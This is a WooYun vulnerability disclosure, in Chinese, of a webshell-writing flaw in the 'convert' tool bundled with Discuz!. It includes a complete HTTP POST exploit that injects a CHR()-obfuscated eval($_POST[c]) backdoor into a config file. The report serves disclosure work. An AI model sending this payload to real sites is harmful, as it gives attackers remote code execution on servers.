当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045611

漏洞标题:discuz!某自带工具可拿shell

相关厂商:Discuz!

漏洞作者: kobin97

提交时间:2013-12-11 14:23

修复时间:2014-03-08 14:23

公开时间:2014-03-08 14:23

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-11: 细节已通知厂商并且等待厂商处理中
2013-12-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-02-09: 细节向核心白帽子及相关领域专家公开
2014-02-19: 细节向普通白帽子公开
2014-03-01: 细节向实习白帽子公开
2014-03-08: 细节向公众公开

简要描述:

discuz!某自带工具,由于使用不当,可以造成webshell。
而且经过调查,使用者数量较大。

详细说明:

discuz! 安装包中会自带一个转换工具 convert
这个工具由于存在安全问题,可以拿shell
一般存在网站目录 convert 或 utility/convert
而且经过调查,使用数量还是很大的。
使用前题是data目录可写,这也是这个工具的使用前题。
分析:
文件:
utility\convert\include\do_config.inc.php

保存配置,跟踪到save_config_file
utility\convert\include\global.func.php
分析方法:getvars 和 buildarray等
可以看出,对key进行过滤只有
getvars 前面,但后面的key完全没有过滤。
在 GPC OFF 时可直接拿shell
ON 时,
if($level == 0) {
$newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
$return .= "\r\n// $newline //\r\n";
}
首字母也写到文件中。我们只要把key 加上换行符,就能实现写shell
通过方法:
POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 199
Content-Type: application/x-www-form-urlencoded
newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR
(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR
(59));//]=aaaa&submit=yes
即可以写shell,shell地址
convert/data/config.inc.php

漏洞证明:

0.jpg


-1.jpg

修复方案:

修改这个程序,或用完删除

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-08 14:23

厂商回复:

最新状态:

暂无